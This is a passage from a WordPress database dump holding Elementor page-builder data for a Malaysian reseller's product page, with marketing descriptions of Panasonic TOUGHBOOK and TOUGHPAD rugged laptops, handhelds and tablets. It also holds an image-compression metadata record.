]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3705,2686,'_elementor_version','0.4'),(3712,2687,'_elementor_version','0.4'),(4035,2730,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.04975004031607799248604351305402815341949462890625;s:5:\"bytes\";i:4018;s:11:\"size_before\";i:99216;s:10:\"size_after\";i:95198;s:4:\"time\";d:0.5100000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:9091;s:10:\"size_after\";i:9091;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.060000000000000053290705182007513940334320068359375;s:5:\"bytes\";i:869;s:11:\"size_before\";i:28353;s:10:\"size_after\";i:27484;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:20911;s:10:\"size_after\";i:20911;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.70999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:3149;s:11:\"size_before\";i:40861;s:10:\"size_after\";i:37712;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(3715,2688,'_elementor_edit_mode','builder'),(3716,2688,'_elementor_template_type','post'),(3717,2688,'_wp_page_template','template-fullwidth.php'),(3718,2688,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":52},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":51},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":53},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3719,2688,'_elementor_version','0.4'),(3722,2689,'_elementor_edit_mode','builder'),(3723,2689,'_elementor_template_type','post'),(3724,2689,'_wp_page_template','template-fullwidth.php'),(3725,2689,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":52},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 